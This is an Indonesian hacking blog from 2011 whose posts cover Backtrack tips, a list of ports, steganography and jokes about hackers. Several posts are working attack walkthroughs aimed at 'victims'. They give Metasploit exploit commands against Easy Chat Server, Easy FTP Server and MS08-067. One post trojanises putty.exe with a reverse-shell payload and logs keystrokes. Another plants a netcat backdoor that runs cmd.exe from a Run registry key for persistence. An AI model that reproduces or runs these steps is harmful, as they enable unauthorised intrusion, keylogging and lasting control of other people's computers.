Wednesday, September 28, 2011

Install sslstrip di Backtrack 5 R1

Suatu ketika pas ane mau menggunkan sslstrip, ane lupa kalau diBacktrack 5 kan itu aplikasi belum terinstall, oleh karena itu ane mau bantuin agan-agan yang juga punya masalah sama kaya untuk bisa menggunakan sslstrip.


1. Download filenya.
root@bt:~# wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz


2. extrack filenya.
root@bt:~# tar zxvf sslstrip-0.9.tar.gz 


3. lakukan instalasi.
root@bt:~# cd sslstrip-0.9
root@bt:~# python setup.py install


4. Selamat menikmati.
root@bt:~# sslstrip


Semoga membantu.

Tuesday, September 27, 2011

Exploit Easy Chat Server v2.2

Sekarang kita akan melakukan Exploitasi terhadap Easy Chat Server v2.2 menggunakan kelemahan pada authentication request request handling buffer overflow dengan exploit efs_easychatserver_username. Tanpa penjelasan yang panjang langsung kita praktekan.

1. Buka Metasploit
msfconsole


2. Jalankan Proses Explotasi.
use exploit/windows/http/efs_easychatserver_username 
set payload windows/shell/bind_tcp 
set rhost IP_Target
exploit


3. Hasilnya.


Note : Tehnik ini telah dicoba dan berjalan pada windows XP sp 1, Windows XP sp 2, Windows XP sp 3, Windows 7.

Perintah dasar Meterpreter

 Buat agan-agan yang sering menggunkan Metasploit pasti sudah sering menggunakan beberapa perintah dibawah ini ketika sudah mendapatkan meterpreter, jadi buat agan-agan yang ingin mendalami Metasploit, ini adalah wajib untuk dipelajari,termasuk ane,hoho..

1. help
Perintah ' help ' akan menampilkan menu help pada terminal.

2. background
Perintah ' background ' mengembalikan kita kepada prompt msf/prompt sebelum exploit dijalankan.

3. ps
Perintah ' ps ' digunakan untuk menampilkan proses yang sedang berjalan.

4. migrate
Perintah ' migrate ' digunakan untuk berpindah pada proses yang lain.

5. ls
Perintah ' ls ' digunakan untuk menampilkan daftar file dari sebuah folder tempat kita berada.

6. download
Perintah ' download ' adalah untuk mendownload file dari komputer korban, dan gunakan double-slashes ( \\ )untuk menetapkan direktori.

7. upload
Perintah ' upload ' adalah untuk mengupload file kedalam komputer korban(biasanya backdoor), dan gunakan double-slashes.

8. ipconfig
Perintah ' ipconfig ' untuk menampilkan kartu jaringan/network interfaces dan alamat korban.

9.  getuid
Perintah ' getuid ' adalah untuk menampilkan hostname dari komputer korban.

10. execute
Perintah ' execute ' adalah untuk menjalankan aplikasi para komputer korban.

11. shell
Perintah ' shell ' adalah perintah untuk mendapatkan shell dari komputer korban(biasanya command Prompt windows).

12. idletime
Perintah ' idletime ' adalah perintah untuk mengetahui lama waktu dari pemakaian komputer.

13. hasdump
Perintah ' hashdump ' untuk menampilkan data dari SAM file.

14. ?
Perintah ' ? ' adalah untuk menampilkan help dari meterpreter.

15. channel
Perintah ' channel ' untuk menampilkan channel yang sedang aktif.

16. close
Perintah ' close ' untuk keluar dari channel.

17. exit
Perintah ' exit ' untuk keluar dari session yang sedang aktif.

18. interact
Perintah ' interact ' untuk interaksi dengan channel.

19. irb
Perintah ' irb ' untuk menjalankan ruby shell command.

20. quit
Perintah ' quit ' kembali kepada terminal meterpreter dan keluar dari session yang aktif.

21. read
Perintah ' read ' membaca data dari channel.

22. run
Perintah ' run ' untuk dapat menjalankan script meterpreter.

23. write
Perintah ' write ' digunakan untuk menulis kedalam channel.

24. cat
Perintah ' cat ' digunakan untuk membaca sebuah file.


Cukup segini dulu y, karena masih banyak lagi perintah yang harus agan-agan ketahui jika ingin mendapatkan hasil yang maksimal dari sebuah exploitasi. Untuk perintah yang lain agan-agan bisa melihatnya di sini.

Exploit Easy FTP Server v1.7

Ane dapat Tutorial baru nih gan, lumayan nambahin pengetahuan kita-kita diblog ini. FTP Server merupakan sebuah server yang memanfaatkan File Transfer Protocol (FTP) untuk keperluan transfer file antar mesin pada jaringan TCP/IP, disini kita memanfaatkan celah keamanan yang terdapat pada aplikasi Easy FTP Server versi 1.7 pada buffer overflow yang dimana kita dapat memanfaatkannya dengan memasukkan input dalam bentuk exploit sehingga data-data yang disimpan melebihi kapasitas buffer memorinya. Intinya dengan proses tersebut maka kita dapat memasukkan berbagai shellcode untuk dijalankan di server, contohnya bind shell.

1. Buka Metasploit

msfconsole


2. Jalankan Proses Exploitasi

use exploit/windows/ftp/easyftp_cwd_fixret 
set payload windows/shell/bind_tcp
set rhost IP_Target
exploit


3. Dan dapatkan shellnya.


Note : Tehnik ini telah dicoba dan berjalan pada windows XP sp 1, Windows XP sp 2, Windows XP sp 3, Windows 7.

Bugs & Fixes Backtrack 5 R1 [Sound]

Kalau agan-agan menggunkan Backtrack 5 atau pun yang R1 mungkin telah menemukan bahwa fungsi sound tidak berfungsi dengan baik, oleh karena itu mari kita selesaikan disini.

1. Pergi ke System > Preferences > Startup Application



2. Kemudian Klik Add dan masukan Konfigurasi dibawah ini.

Name : Pulseaudio daemon
Command :/usr/bin/pulseaudio
Comment : Start the sound daemon


Logout dan Login kembali, selamat menikmati musik.

Monday, September 26, 2011

Membuat Screen Lock DiBacktrack

Kalau agan-agan pernah pake ubuntu, kan kalau mau setting ScreenLock bisa disetting diScreenSaver tuh, berhubung diBacktrack paket bawaan nya tidak menyertakan ScreenSaver ane memutuskan untuk membuatnya.Check It Out gan.

1. Install xlockmore

apt-get install xlockmore


2. Masuk kedalam pengaturan shortcut di System > Preferences > Keyboard Shortcuts


3. Cari Action Lock Screen dan disable


4. Kemudian klik tombol add untuk menambahkan shortcut baru


5. Isi Name : Lock Screen dan Command : xlock kemudian klik Apply


6. klik Shortcut yang baru kita buat kemudian tekan Ctrl + Alt + L untuk shortcut keyboard.


7. Ini hasilnya gan.

Tuesday, September 20, 2011

Membuat backdoor dengan x86/shikata_ga_nai

Kalau agan-agan berpikir Windows 7 itu ngak bisa diexploit, agan salah besar karena ada banyak cara yang dilakukan untuk bisa melakukan exploitasi terhadap sebuah Operasi Sistem, sekarang kita akan melakukan exploitasi terhadap Windows Xp dan 7, ditambah lagi cara untuk melakukan rekaman terhadap ketikan keyboard(keylogger) melalui meterpreter.Check it Out.

1. Cari file yang akan kalian gunakan untuk memancing target mengeksekusi file tersebut. Disini ane menggunakan file putty.exe, jadi download dulu y.

root@bt:~# wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe


2. Infeksi file yang akan dieksekusi dengan payload exploit.rubah nama putty.exe manjadi putty_pro.exe dan gunakan exploit x86/shikata_ga_nai,buat yang master udah ngertilah.

root@bt:/# cd /pentest/exploits/framework
root@bt:/pentest/exploits/framework# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.125 R |./msfencode -t exe -x /tmp/putty.exe -k -o /tmp/putty_pro.exe -e x86/shikata_ga_nai -c 5


3. Jalankan Metasploit dan buat listener agar ketika file yang kita buat diatas dieksekusi meterpreter akan langsung terbuka.

msfconsole 
use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set lhost IP_KITA
exploit


4. Entah bagaimana caranya copy file yang sudah diinfeksi diatas kedalam komputer korban,entah bagaimana caranya[usaha itu perlu bro].Ketika file dieksekusi maka secara otomatis meterpreter akan terbuka.sekarang terserah kalian mau diapakan komputer itu.



note : komputer kita dengan target akan hilang koneksi ketika file yang dieksekusi ditutup[dicobain biar tau].


5. Plus dari ane adalah merecord semua ketikan dari keyboard.Gunakan perintah keyscan_start dan untuk melihat hasil ketikan dari korban gunakan keyscan_dump. Pawned !

Windows XP :



Windows 7 :



Semoga tutorial ini bisa membantu temen-temen yang kesulitan mencari tutorial.

Saturday, September 17, 2011

10 Film Hacker Terbaik

Malam-malam ane lagi browsing trus cari film-film terbaru, terus iseng ane cari film dengan keyword hacker movie akhirnya bermunculanlah postingan yang memuat pilem-pilem tentang hacker. Ni ane kasih daftar 10 pilem hacking terbaik yang pernah ada.

1. Tron (1982)


2. Wargames (1983)


3. Sneakers (1992)


4. Revolution OS (2001)


5. Swordfish (2001)


6. The Score (2001)


7. Foolproof (2003)


8. The Italian Job (2003)


9. Die Hard 4: Live Free or Die Hard (2007)


10. Untraceable (2008)

Untuk sahabat penggemar film Hacker, coba yang satu ini : Reboot - Film Hacker 2012.

Wednesday, September 7, 2011

Jenis Port dan Kegunaannya


1-19, berbagai protokol, Sebagian banyak port ini tidak begitu di perlukan namun tidak dapat diganggu. Contohnya layanan echo (port 7) yang tidak boleh dikacaukan dengan program ping umum.

20 – FTP-DATA. “Active” koneksi FTP menggunakan dua port: 21 adalah port kontrol, dan 20 adalah tempat data yang masuk. FTP pasif tidak menggunakan port 20 sama sekali.

21 – Port server FTP yang digunakan oleh File Transfer Protocol. Ketika seseorang mengakses FTP server, maka ftp client secara default akan melakukan koneksi melalui port 21.

22 – SSH (Secure Shell), Port ini ini adalah port standar untuk SSH, biasanya diubah oleh pengelola server untuk alasan keamanan.

23 – Telnet server. Jika anda menjalankan server telnet maka port ini digunakan client telnet untuk hubungan dengan server telnet.

25 – SMTP, Simple Mail Transfer Protocol, atau port server mail, merupakan port standar yang digunakan dalam komunikasi pengiriman email antara sesama SMTP Server.

37 – Layanan Waktu, port built-in untuk layanan waktu.

53 – DNS, atau Domain Name Server port. Name Server menggunakan port ini, dan menjawab pertanyaan yang terkait dengan penerjamahan nama domain ke IP Address.

67 (UDP) – BOOTP, atau DHCP port (server). Kebutuhan akan Dynamic Addressing dilakukan melalui port ini.

68 (UDP) – BOOTP, atau DHCP port yang digunakan oleh client.

69 – tftp, atau Trivial File Transfer Protocol.

79 – Port Finger, digunakan untuk memberikan informasi tentang sistem, dan login pengguna.

80 – WWW atau HTTP port server web. Port ini biasanya digunakan untuk web server, jadi ketika user mengetikan alamat IP atau hostname di web broeser maka web browser akan melihat IP tsb pada port 80,

81 – Port Web Server Alternatif, ketika port 80 diblok maka port 81 dapat digunakan sebagai port altenatif untuk melayani HTTP.

98 – Port Administrasi akses web Linuxconf port.

110 – POP3 Port, alias Post Office Protocol, port server pop mail. Apabila anda mengambil email yang tersimpan di server dapat menggunakan teknologi POP3 yang berjalan di port ini.

111 – sunrpc (Sun Remote Procedure Call) atau portmapper port. Digunakan oleh NFS (Network File System), NIS (Network Information Service), dan berbagai layanan terkait.

113 – identd atau auth port server. Kadang-kadang diperlukan, oleh beberapa layanan bentuk lama (seperti SMTP dan IRC) untuk melakukan validasi koneksi.

119 – NNTP atau Port yang digunakan oleh News Server, sudah sangat jarang digunakan.

123 – Network Time Protocol (NTP), port yang digunakan untuk sinkronisasi dengan server waktu di mana tingkat akurasi yang tinggi diperlukan.

137-139 – NetBIOS (SMB).

143 – IMAP, Interim Mail Access Protocol. Merupakan aplikasi yang memungkinkan kita membaca e-mail yang berada di server dari komputer di rumah / kantor kita, protokol ini sedikit berbeda dengan POP.

161 – SNMP, Simple Network Management Protocol. Lebih umum digunakan di router dan switch untuk memantau statistik dan tanda-tanda vital (keperluan monitoring).

177 – XDMCP, X Display Management Control Protocol untuk sambungan remote ke sebuah X server.

443 – HTTPS, HTTP yang aman (WWW) protokol di gunakan cukup lebar.

465 – SMTP atas SSL, protokol server email

512 (TCP) – exec adalah bagaimana menunjukkan di netstat. Sebenarnya nama yang tepat adalah rexec, untuk Remote Execution.

512 (UDP) – biff, protokol untuk mail pemberitahuan.

513 – Login, sebenarnya rlogin, alias Remote Login. Tidak ada hubungannya dengan standar / bin / login yang kita gunakan setiap kali kita log in.

514 (TCP) – Shell adalah nama panggilan, dan bagaimana netstat menunjukkan hal itu. Sebenarnya, rsh adalah aplikasi untuk “Remote Shell”. Seperti semua “r” perintah ini melemparkan kembali ke kindler, sangat halus.

514 (UDP) – Daemon syslog port, hanya digunakan untuk tujuan logging remote.

515 – lp atau mencetak port server.

587 – MSA, Mail Submission Agent. Sebuah protokol penanganan surat baru didukung oleh sebagian besar MTA’s (Mail Transfer Agent).

631 – CUPS (Daemon untuk keperluan printing), port yang melayani pengelolaan layanan berbasis web.

635 – Mountd, bagian dari NFS.

901 – SWAT, Samba Web Administration Tool port. Port yang digunakan oleh aplikasi pengelolaan SAMBA berbasis web.

993 – IMAP melalui SSL.

995 – POP melalui SSL.

1024 – Ini adalah port pertama yang merupakan Unprivileged port, yang ditugaskan secara dinamis oleh kernel untuk aplikasi apa pun yang memintanya. Aplikasi lain umumnya menggunakan port unprivileged di atas port 1024.

1080 – Socks Proxy Server.

1433 – MS SQL Port server.

2049 – NFSd, Network File Service Daemon port.

2082 – Port cPanel, port ini digunakan untuk aplikasi pengelolaan berbasis web yang disediakan oleh cpanel.

2095 – Port ini di gunakan untuk aplikasi webmail cpanel.

2086 – Port ini di gunakan untuk WHM, atau Web Host Manager cpanel.

3128 – Port server Proxy Squid.

3306 – Port server MySQL.

5432 – Port server PostgreSQL.

6000 – X11 TCP port untuk remote. Mencakup port 6000-6009 karena X dapat mendukung berbagai menampilkan dan setiap tampilan akan memiliki port sendiri. SSH X11Forwarding akan mulai menggunakan port pada 6.010.

6346 – Gnutella.

6667 – ircd, Internet Relay Chat Daemon.

6699 – Napster.

7100-7101 – Beberapa Font server menggunakan port tersebut.

8000 dan 8080 – Common Web Cache dan port server Proxy Web.

10000 – Webmin, port yang digunakan oleh webmin dalam layanan pengelolaan berbasis web.

Thanks to ngenets

Steganografi

Steganografi adalah sebuah seni dan ilmu untuk menulis pesan tersembunyi atau menyembunyikan suatu pesan dengan suatu cara sehingga selain si pengirim dan si penerima, tidak ada seorangpun yang dapat mengetahui atau menyadari bahwa ada suatu pesan rahasia didalamnya. Sebaliknya, kriptografi menyamarkan arti dari sebuah pesan, tapi tidak menyembunyikan bahwa ada suatu pesan didalamnya. Kata "steganografi" berasal dari bahasa Yunani steganos, yang artinya “tersembunyi atau terselubung”, dan graphein, “menulis”.

Kini, istilah steganografi termasuk penyembunyian data digital kedalam berkas-berkas (file) komputer. Contohnya, si pengirim mulai dengan berkas gambar yang biasa, lalu mengatur warna setiap pixel ke-100 untuk menyesuaikan suatu huruf dalam alphabet (perubahannya begitu halus sehingga tidak ada seorangpun yang dapat menyadarinya jika ia tidak benar-benar memperhatikannya).

Pada umumnya, pesan steganografi muncul dengan rupa lain seperti gambar, artikel, daftar belanjaan, atau pesan-pesan lainnya. Pesan yang tertulis ini merupakan tulisan yang menyelubungi atau menutupi. Contohnya, suatu pesan bisa disembunyikan dengan menggunakan tinta yang tidak terlihat di antara garis-garis yang kelihatan.

Teknik steganografi meliputi banyak sekali metode komunikasi untuk menyembunyikan pesan rahasia (teks atau gambar) di dalam berkas-berkas lain yang mengandung teks, image, bahkan audio tanpa menunjukkan ciri-ciri perubahan yang nyata atau terlihat dalam kualitas dan struktur dari berkas semula. Metode ini termasuk tinta yang tidak tampak, microdots, pengaturan kata, tanda tangan digital, jalur tersembunyi dan komunikasi spektrum lebar.

Tujuan dari steganografi adalah merahasiakan atau menyembunyikan keberadaan dari sebuah pesan tersembunyi atau sebuah informasi. Dalam prakteknya, kebanyakan pesan disembunyikan dengan membuat perubahan tipis terhadap data digital lain yang isinya tidak akan menarik perhatian dari penyerang potensial, sebagai contoh sebuah gambar yang terlihat tidak berbahaya. Perubahan ini bergantung pada kunci (sama pada kriptografi) dan pesan untuk disembunyikan. Orang yang menerima gambar kemudian dapat menyimpulkan informasi terselubung dengan cara mengganti kunci yang benar ke dalam algoritma yang digunakan.

Pada metode steganografi cara ini sangat berguna jika digunakan pada cara steganografi komputer karena banyak format berkas digital yang dapat dijadikan media untuk menyembunyikan pesan. Format yang biasa digunakan di antaranya:

    Format image : bitmap (bmp), gif, pcx, jpeg, dll.
    Format audio : wav, voc, mp3, dll.
    Format lain : teks file, html, pdf, dll.

Kelebihan steganografi jika dibandingkan dengan kriptografi adalah pesan-pesannya tidak menarik perhatian orang lain. Pesan-pesan berkode dalam kriptografi yang tidak disembunyikan, walaupun tidak dapat dipecahkan, akan menimbulkan kecurigaan. Seringkali, steganografi dan kriptografi digunakan secara bersamaan untuk menjamin keamanan pesan rahasianya.

Sebuah pesan steganografi (plaintext), biasanya pertama-tama dienkripsikan dengan beberapa arti tradisional, yang menghasilkan ciphertext. Kemudian, covertext dimodifikasi dalam beberapa cara sehingga berisi ciphertext, yang menghasilkan stegotext. Contohnya, ukuran huruf, ukuran spasi, jenis huruf, atau karakteristik covertext lainnya dapat dimanipulasi untuk membawa pesan tersembunyi; hanya penerima (yang harus mengetahui teknik yang digunakan) dapat membuka pesan dan mendekripsikannya.

Thanks to Wikipedia

Monday, September 5, 2011

Ciri ciri HACKER menurut Kaskus

1. Berkacamata
alias pake kacamata...
mengapa seorang Hacker biasa memakai kacamata...
gimana gak pake kacamata... wong tiap hari pelototin komputer terus....
minus...minus dah tuh mata....
tambah lagi Punya kaca mata yang bisa deteksi adanya jaringan wireless (udah ngayal nih)

2. kemana2 bawa laptop
setiap saat bisa langsung online nih

3. Berbadan Kurus
kok Hacker berbadan kurus...(tergantung selera , ada juga yg gemuk gan )
gimana gak kurus.... tiap disuruh makan...
"ntar dulu ah lagi nanggung neh didepan komputer...."
makannya ntar aja...

4. Botak
ga botak juga sih tergantung selera hacker juga kali . mungkin yg botak kebanyakan mikir sehingga rambutnya rontok smua.

5. Jarang Mandi
gimana gak jarang mandi....
disuruh mandi.... ntar dulu ah lagi nanggung, dikit lagi bisa dijebol nech...
jebol apa...??? gak tau dah....

6. Pake Celana Jeans ama Jaket Item
tiap kalo jalan pasti pake celana Jeans ama Jaket item...
ini Hacker apa Copet yach...???

7. Sering menghayal
biasanya sih... Hacker sering menghayal....
gak tau ngehayal apa.... mungkin menghayal gimana bisa menembus komputer orang kale...

8. Sering Diem
Nah ini mungkin diem... karena die menghayal tade kayak nya....

9. Jarang tidur(begadangan)
kutak katik di depan kompie ampi pagi and pagi lagi.

10. jarinya keriting
lho..kok jarinya bukan rambutnya...(kebanyakkan neken keybord)

11.kalo kemana2 jakil
(jalan kaki karo sikil) kadang2 nebeng, kalo lagi ada duit naek angkot.

12. matanya merah.
karena dari semua yang diatas tadi...1-11.

13. tabungannya banyak
soalnya jarang makan dan jarang mandi (uang makan + uang buat beli sabun di tabung)

Tehnik seorang hacker menembus situs atau web

1. IP Spoofing

IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP attacker sehingga sasaran menganggap alamat IP attacker adalah alamat IP dari host di dalam network bukan dari luar network. Misalkan attacker mempunyai IP address type A 66.25.xx.xx ketika attacker melakukan serangan jenis ini maka Network yang diserang akan menganggap IP attacker adalah bagian dari Networknya misal 192.xx.xx.xx yaitu IP type C.
IP Spoofing terjadi ketika seorang attacker ‘mengakali’ packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk routing biasanya di transmisikan secara transparan dan jelas sehingga membuat attacker dengan mudah untuk memodifikasi asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh attacker tetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para attacker.

2. FTP Attack

Salah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yang diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk mendapatkan command shell ataupun untuk melakukan Denial Of Service. Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau attacker untuk mengambil resource didalam network tanpa adanya autorisasi, sedangkan command shell dapat membuat seorang attacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang attacker bisa membuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yang diserang.
Tidak pernah atau jarang mengupdate versi server dan mempatchnya adalah kesalahan yang sering dilakukan oleh seorang admin dan inilah yang membuat server FTP menjadi rawan untuk dimasuki. Sebagai contoh adalah FTP server yang populer di keluarga UNIX yaitu WU-FTPD yang selalu di upgrade dua kali dalam sehari untuk memperbaiki kondisi yang mengizinkan terjadinya bufferoverflow Mengexploitasi FTP juga berguna untuk mengetahui password yang terdapat dalam sistem, FTP Bounce attack (menggunakan server ftp orang lain untuk melakukan serangan), dan mengetahui atau mensniff informasi yang berada dalam sistem.

3. Unix Finger Exploits

Pada masa awal internet, Unix OS finger utility digunakan secara efficient untuk men sharing informasi diantara pengguna. Karena permintaan informasi terhadap informasi finger ini tidak menyalahkan peraturan, kebanyakan system Administrator meninggalkan utility ini (finger) dengan keamanan yang sangat minim, bahkan tanpa kemanan sama sekali. Bagi seorang attacker utility ini sangat berharga untuk melakukan informasi tentang footprinting, termasuk nama login dan informasi contact.
Utility ini juga menyediakan keterangan yang sangat baik tentang aktivitas user didalam sistem, berapa lama user berada dalam sistem dan seberapa jauh user merawat sistem. Informasi yang dihasilkan dari finger ini dapat meminimalisasi usaha kracker dalam menembus sebuah sistem. Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini sudah cukup bagi seorang atacker untuk melakukan social engineering dengan menggunakan social skillnya untuk memanfaatkan user agar ‘memberitahu’ password dan kode akses terhadap system.

4. Flooding & Broadcasting

Seorang attacker bisa menguarangi kecepatan network dan host-host yang berada di dalamnya secara significant dengan cara terus melakukan request/permintaan terhadap suatu informasi dari sever yang bisa menangani serangan classic Denial Of Service(Dos), mengirim request ke satu port secara berlebihan dinamakan flooding, kadang hal ini juga disebut spraying. Ketika permintaan flood ini dikirim ke semua station yang berada dalam network serangan ini dinamakn broadcasting. Tujuan dari kedua serangan ini adalah sama yaitu membuat network resource yang menyediakan informasi menjadi lemah dan akhirnya menyerah.
Serangan dengan cara Flooding bergantung kepada dua faktor yaitu: ukuran dan/atau volume (size and/or volume). Seorang attacker dapat menyebabkan Denial Of Service dengan cara melempar file berkapasitas besar atau volume yang besar dari paket yang kecil kepada sebuah system. Dalam keadaan seperti itu network server akan menghadapi kemacetan: terlalu banyak informasi yang diminta dan tidak cukup power untuk mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan kapasitas proses yang besar pula, tetapi secara tidak normal paket yang kecil dan sama dalam volume yang besar akan menghabiskan resource secara percuma, dan mengakibatkan kemacetan.

5. Fragmented Packet Attacks

Data-data internet yang di transmisikan melalui TCP/IP bisa dibagi lagi ke dalam paket-paket yang hanya mengandung paket pertama yang isinya berupa informasi bagian utama( kepala) dari TCP. Beberapa firewall akan mengizinkan untuk memroses bagian dari paket-paket yang tidak mengandung informasi alamat asal pada paket pertamanya, hal ini akan mengakibatkan beberapa type system menjadi crash. Contohnya, server NT akan menjadi crash jika paket-paket yang dipecah(fragmented packet) cukup untuk menulis ulang informasi paket pertama dari suatu protokol.

6. E-mail Exploits

Peng-exploitasian e-mail terjadi dalam lima bentuk yaitu: mail floods, manipulasi perintah (command manipulation), serangan tingkat transportasi(transport level attack), memasukkan berbagai macam kode (malicious code inserting) dan social engineering(memanfaatkan sosialisasi secara fisik). Penyerangan email bisa membuat system menjadi crash, membuka dan menulis ulang bahkan mengeksekusi file-file aplikasi atau juga membuat akses ke fungsi fungsi perintah (command function).


7. DNS and BIND Vulnerabilities

Berita baru-baru ini tentang kerawanan (vulnerabilities) tentang aplikasi Barkeley Internet Name Domain (BIND) dalam berbagai versi mengilustrasikan kerapuhan dari Domain Name System (DNS), yaitu krisis yang diarahkan pada operasi dasar dari Internet (basic internet operation).

8. Password Attacks

Password merupakan sesuatu yang umum jika kita bicara tentang kemanan. Kadang seorang user tidak perduli dengan nomor pin yang mereka miliki, seperti bertransaksi online di warnet, bahkan bertransaksi online dirumah pun sangat berbahaya jika tidak dilengkapi dengan software security seperti SSL dan PGP. Password adalah salah satu prosedur kemanan yang sangat sulit untuk diserang, seorang attacker mungkin saja mempunyai banyak tools (secara teknik maupun dalam kehidupan sosial) hanya untuk membuka sesuatu yang dilindungi oleh password.
Ketika seorang attacker berhasil mendapatkan password yang dimiliki oleh seorang user, maka ia akan mempunyai kekuasaan yang sama dengan user tersebut. Melatih karyawan/user agar tetap waspada dalam menjaga passwordnya dari social engineering setidaknya dapat meminimalisir risiko, selain berjaga-jaga dari praktek social enginering organisasi pun harus mewaspadai hal ini dengan cara teknikal. Kebanyakan serangan yang dilakukan terhadap password adalah menebak (guessing), brute force, kracking dan sniffing.

9.Proxy Server Attacks

Salah satu fungsi Proxy server adalah untuk mempercepat waktu response dengan cara menyatukan proses dari beberapa host dalam suatu trusted network. Dalam kebanyakan kasus, tiap host mempunyai kekuasan untuk membaca dan menulis (read/write) yang berarti apa yang bisa saya lakukan dalam sistem saya akan bisa juga saya lakukan dalam system anda dan sebaliknya.

10. Remote Command Processing Attacks

Trusted Relationship antara dua atau lebih host menyediakan fasilitas pertukaran informasi dan resource sharing. Sama halnya dengan proxy server, trusted relationship memberikan kepada semua anggota network kekuasaan akses yang sama di satu dan lain system (dalam network).
Attacker akan menyerang server yang merupakan anggota dari trusted system. Sama seperti kerawanan pada proxy server, ketika akses diterima, seorang attacker akan mempunyai kemampuan mengeksekusi perintah dan mengkases data yang tersedia bagi user lainnya.

11. Remote File System Attack

Protocol-protokol untuk tranportasi data –tulang punggung dari internet— adalah tingkat TCP (TCPLevel) yang mempunyai kemampuan dengan mekanisme untuk baca/tulis (read/write) Antara network dan host. Attacker bisa dengan mudah mendapatkan jejak informasi dari mekanisme ini untuk mendapatkan akses ke direktori file.

12. Selective Program Insertions

Selective Program Insertions adalah serangan yang dilakukan ketika attacker menaruh program-program penghancur, seperti virus, worm dan trojan (mungkin istilah ini sudah anda kenal dengan baik ?) pada system sasaran. Program-program penghancur ini sering juga disebut malware. Program-program ini mempunyai kemampuan untuk merusak system, pemusnahan file, pencurian password sampai dengan membuka backdoor.

13. Port Scanning

Melalui port scanning seorang attacker bisa melihat fungsi dan cara bertahan sebuah system dari berbagai macam port. Seorang atacker bisa mendapatkan akses kedalam sistem melalui port yang tidak dilindungi. Sebaia contoh, scaning bisa digunakan untuk menentukan dimana default SNMP string di buka untuk publik, yang artinya informasi bisa di extract untuk digunakan dalam remote command attack.

14.TCP/IP Sequence Stealing,

Passive Port Listening and Packet
Interception TCP/IP Sequence Stealing, Passive Port Listening dan Packet Interception berjalan untuk mengumpulkan informasi yang sensitif untuk mengkases network. Tidak seperti serangan aktif maupun brute-force, serangan yang menggunakan metoda ini mempunyai lebih banyak kualitas stealth-like.

15. HTTPD Attacks

Kerawanan yang terdapat dalam HTTPD ataupun webserver ada lima macam: buffer overflows, httpd bypasses, cross scripting, web code vulnerabilities, dan URL floods.
HTTPD Buffer Overflow bisa terjadi karena attacker menambahkan errors pada port yang digunakan untuk web traffic dengan cara memasukan banyak carackter dan string untuk menemukan tempat overflow yang sesuai. Ketika tempat untuk overflow ditemukan, seorang attacker akan memasukkan string yang akan menjadi perintah yang dapat dieksekusi. Bufer-overflow dapat memberikan attacker akses ke command prompt.

thanks to Kaskus

Membuat Backdoor pada Windows

Artikel sebelumnya ane pernah nulis tentang exploit windows dengan mendapatkan hak akses pada komputer korban menggunakan metasploit, mungkin buat agan-agan yang pengen masuk kedalam komputer korban harus mengetik perintah-perintah yang panjang,sehingga membuat tangan menjadi pegal,lemas,dan lesu,hehe.. .Lain halnya jika kita sudah memiliki backdoor didalam komputer sikorban,bagaimana cara meletakan backdoornya langsung aja kita ketkp.

1. Download Backdoornya dan extrak filenya.

root@bt:~# wget http://downloadnetcat.com/nc11nt.zip
root@bt:~# unzip nc11nt.zip


2. Lakukan Exploitasi pada komputer korban dan dapatkan meterpreternya.

use windows/smb/ms08_067_netapi
set payload windows/meterpreter/bind_tcp 
set lhost IP_KITA
set rhost IP_KORBAN
set lport 8080
exploit


3. Upload Backdoornya kekomputer sikorban.

upload nc.exe C:\\Windows\\System32\\


4. Lakukan penulisan pada registry sehingga backdoor dapat dieksekusi ketika komputer dinyalakan.

reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v Gilakomputer -d "C://Windows//System32//nc.exe -L -d -p 4321 -e cmd.exe"


5. Lihat hasil kelakuan kalian, hanya dengan 1 perintah komputer sudah bisa dikuasai.

nc IP_KORBAN 4321



 
biz.